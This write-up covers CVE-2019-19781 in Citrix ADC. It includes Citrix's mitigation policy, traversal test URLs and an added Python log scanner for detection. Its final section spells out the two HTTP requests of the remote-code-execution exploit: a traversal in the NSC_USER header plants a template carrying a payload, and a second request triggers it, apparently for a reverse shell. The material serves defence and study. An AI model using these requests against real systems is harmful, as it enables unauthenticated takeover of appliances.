Citrix Admin URL RCE (CVE-2019-19781)

Check the vulnerability

From the Citrix advisory it looks like a crafted URL lets an unauthenticated client bypass the permission checks on the /vpns/ path. The mitigation published by Citrix is the following responder policy, which answers 403 to any request whose decoded URL contains "/vpns/" and either has no SSL VPN session or contains "/../":

enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config

A legitimate URL is https://<host>/vpn/tmindex.html; with the traversal variant https://<host>/vpn/..%2fvpns/apps.html you reach the admin panel without a VPN session.

You can test the vulnerability by requesting files under /vpns/ through the traversal, for example:

/vpn/../vpns/services.html
/vpn/../vpns/cfg/smb.conf

You can tell whether a server is patched because a patched one answers those requests with the following HTTP response line:

HTTP/1.1 403 Forbidden
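As an added example (not from the original page or from Citrix), the following Python re-implements the condition of the responder policy above and runs it over constructed access-log lines, so a defender can find requests that the mitigation would have rejected. The "METHOD PATH" log format is an assumption; `is_sslvpn` defaults to False because the log does not record session state.

```python
from urllib.parse import unquote

# Constructed sample log (not real Citrix log output), one "METHOD PATH" per line.
SAMPLE_LOG = """\
GET /vpn/tmindex.html
GET /vpn/..%2fvpns/apps.html
GET /vpn/../vpns/cfg/smb.conf
POST /vpn/../vpns/portal/scripts/newbm.pl
GET /vpns/services.html
"""


def matches_ctx267027(url: str, is_sslvpn: bool = False) -> bool:
    """Mirror the policy ctx267027: percent-decode the URL once (like
    DECODE_USING_TEXT_MODE), then flag it when it contains "/vpns/" and the
    client has no SSL VPN session or the decoded URL contains "/../"."""
    decoded = unquote(url)
    return "/vpns/" in decoded and (not is_sslvpn or "/../" in decoded)


def flag_log_lines(log: str) -> list[str]:
    """Return the request paths the mitigation would have answered with 403."""
    flagged = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue  # skip malformed or empty lines
        path = parts[1].split("?", 1)[0]  # drop any query string
        if matches_ctx267027(path):
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    for path in flag_log_lines(SAMPLE_LOG):
        print("would be blocked:", path)
```

Requests flagged while a valid SSL VPN session existed are exactly the traversal ones, which is the case the fix was written for.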

Exploit

A full exploit can be downloaded here. It uses a Python reverse shell, so you need a listener. Exploiting the vulnerability takes the following two requests:

  • Create a fake template file containing the payload, using the path traversal in the NSC_USER header
  • Request the created template so the payload is rendered and executed

First request (writes the template):

POST https://{host}:{port}/vpn/../vpns/portal/scripts/newbm.pl
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
NSC_USER: ../../../netscaler/portal/templates/<filename>
NSC_NONCE: <nonce>

url=127.0.0.1&title=<payload>&desc=desc&UI_inuse=a

Second request (triggers the payload):

GET https://{host}:{port}/vpn/../vpns/portal/<filename>.xml
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
NSC_USER: <randomuser>
NSC_NONCE: <nonce>